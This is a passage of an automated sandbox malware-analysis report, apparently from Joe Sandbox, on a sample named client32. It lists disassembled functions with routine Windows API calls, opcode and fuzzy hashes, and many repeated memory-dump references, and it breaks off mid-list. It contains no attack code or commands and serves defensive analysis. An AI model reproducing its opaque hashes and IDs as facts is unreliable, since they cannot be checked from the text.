                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$_malloc_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102557794-0
                                                                                                                                                                • Opcode ID: 1c22060808709afaf57f2649ea135f72b0ef8cdbe377c2159db6d762bce3d51e
                                                                                                                                                                • Instruction ID: bc88cdd7d00a512ad937ccbd5546e1cf7d4331b3f90937632bbc6b3001438dde
                                                                                                                                                                • Opcode Fuzzy Hash: 1c22060808709afaf57f2649ea135f72b0ef8cdbe377c2159db6d762bce3d51e
                                                                                                                                                                • Instruction Fuzzy Hash: B01136359002056BD3118E28D884FDB77989F86318F14C074FD895F301E676F659C7E1
                                                                                                                                                                Function 1115F5A0 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetPropA.USER32(00000000,00000000,00000000), ref: 1115F5BE
                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,1115EFA0), ref: 1115F5CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongPropWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2492497586-0
                                                                                                                                                                • Opcode ID: c05c6e6288d3a3d14a402612a0d1db815d1716341a10c30e009bc35bd52c63d6
                                                                                                                                                                • Instruction ID: ebaf63801bb2c113ff659c1712ac85dbfa77fd7e98781eb7f85c4d97d2f6111a
                                                                                                                                                                • Opcode Fuzzy Hash: c05c6e6288d3a3d14a402612a0d1db815d1716341a10c30e009bc35bd52c63d6
                                                                                                                                                                • Instruction Fuzzy Hash: 750180B66047259BD3208F6AE844F63FBB8EB91735F00862AF575C2684C775A445CB60
                                                                                                                                                                Function 1110F6C0 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1110F6CE
                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F0590,?,110CD565,00000000,76963760), ref: 1110F6D8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD565,00000000,76963760), ref: 1110F6F8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD565,00000000,76963760), ref: 1110F70C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2905768538-0
                                                                                                                                                                • Opcode ID: 1b85fd5003bc41475be2c39dfef8de15ef87e0ef5217c637cf4fdbd55d1a97c7
                                                                                                                                                                • Instruction ID: 8fea8d8a0e9e9bca353f75b5b31663af0f33d7b4dd1854e9b66d2f3d0ef10814
                                                                                                                                                                • Opcode Fuzzy Hash: 1b85fd5003bc41475be2c39dfef8de15ef87e0ef5217c637cf4fdbd55d1a97c7
                                                                                                                                                                • Instruction Fuzzy Hash: 79F06D7661122CAFC705DF68D88489AB7A8FF99316B10416AF925D7200EB31A905CBE2
                                                                                                                                                                Function 111255F0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 11125618
                                                                                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 1112561F
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 1112563C
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 11125649
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                                • Opcode ID: 07959606f148dd7a76db80489b0d6611aeda32f58190f223d79de68461939c76
                                                                                                                                                                • Instruction ID: 0e614260bbeea70f64d5cf2d11fc089c3b17e942c28c3c8fe15be07d3787ba7c
                                                                                                                                                                • Opcode Fuzzy Hash: 07959606f148dd7a76db80489b0d6611aeda32f58190f223d79de68461939c76
                                                                                                                                                                • Instruction Fuzzy Hash: E901AF706007059FE320EFA9D880B46F7E8EF44B10F10C42ED25EC7A90D7B4A880CB90
                                                                                                                                                                Function 11137470 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(?,00000000,76963760,110F787A,?,00000104), ref: 11137478
                                                                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 11137486
                                                                                                                                                                  • Part of subcall function 11112450: FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111245A
                                                                                                                                                                  • Part of subcall function 11112450: SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11112470
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 111374BA
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 111374C4
                                                                                                                                                                  • Part of subcall function 11095550: _memset.LIBCMT ref: 1109557F
                                                                                                                                                                  • Part of subcall function 11095550: FreeLibrary.KERNEL32(00000000,?,76974920,111190F7,00000002), ref: 1109558A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Delete$ObjectWindow$AtomDestroyFindFreeGlobalLibraryMessageSend_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 370783926-0
                                                                                                                                                                • Opcode ID: 53fdca84920e40efe94fc3fa58a785f55c5950bd8829f110330c5c5a02a08ff7
                                                                                                                                                                • Instruction ID: 14ccb1b08635f6ad0dbd88351c003f3151617864b33ccf8e0f064d8c319cfbe3
                                                                                                                                                                • Opcode Fuzzy Hash: 53fdca84920e40efe94fc3fa58a785f55c5950bd8829f110330c5c5a02a08ff7
                                                                                                                                                                • Instruction Fuzzy Hash: 2FF02776A14A2457D6146B39AC84F2BF7EC9FC4B29705402CF969E3208EA24F801C7A1
                                                                                                                                                                Function 1109D920 Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00002710,00000000,033B5C68,1102D6AE), ref: 1109D943
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 1109D949
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00002710), ref: 1109D958
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1109D95E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ObjectSingleWait$CloseEventHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1408678129-0
                                                                                                                                                                • Opcode ID: 846780fe24238d05f8ea303f766d702ce9d445e534c6b853cd2d17a2a231c517
                                                                                                                                                                • Instruction ID: c4e094f67cca868105e763c6fb19f34944fabb5e905d4d31a135331f0fcc6d8b
                                                                                                                                                                • Opcode Fuzzy Hash: 846780fe24238d05f8ea303f766d702ce9d445e534c6b853cd2d17a2a231c517
                                                                                                                                                                • Instruction Fuzzy Hash: D2F0BE356047149BE324DB7CC884A1BF7E9BF8C700B04891DE1AAC3680C6B0F840CB50
                                                                                                                                                                Function 11113240 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11113252
                                                                                                                                                                • SetCursor.USER32(00000000,?,?,11120606,00000000,00000000,11124B99,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 11113259
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 11113270
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 1111327D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$Destroy$Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3167891023-0
                                                                                                                                                                • Opcode ID: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                                                                                                • Instruction ID: a2e30b34d5d2f1c91a37dce4984a5637c3bf472293567a6a29e36ae9608199f7
                                                                                                                                                                • Opcode Fuzzy Hash: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                                                                                                • Instruction Fuzzy Hash: 5EE09B7091CB009BDB019B798CCC957F7E8BBD4711B20093DE17EC210CC735A4418B10
                                                                                                                                                                Function 1103F680 Relevance: 6.0, APIs: 4, Instructions: 17registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CloseFlush
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2750089244-0
                                                                                                                                                                • Opcode ID: 19c1c69e5854f11e5428eaa1a0434da58e73af4fd149b7a53c3dd0f6c9fe46fd
                                                                                                                                                                • Instruction ID: b6ea975446b4fd8bbc320cf01611fb481712397f03ed61272bf20ca86f9a5abf
                                                                                                                                                                • Opcode Fuzzy Hash: 19c1c69e5854f11e5428eaa1a0434da58e73af4fd149b7a53c3dd0f6c9fe46fd
                                                                                                                                                                • Instruction Fuzzy Hash: 65D09E3652402CAF86056AB5AC888AFFB6CDA895653055136F625D2104866568029BE1
                                                                                                                                                                Function 110071A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                                                                                                • SetFocus.USER32(?), ref: 11007353
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 1305092643-2167791130
                                                                                                                                                                • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                                                                                                • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                                                                                                • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                                                                                                • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                                                                                                Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                                                                                                • _memmove.LIBCMT ref: 110092B6
                                                                                                                                                                  • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
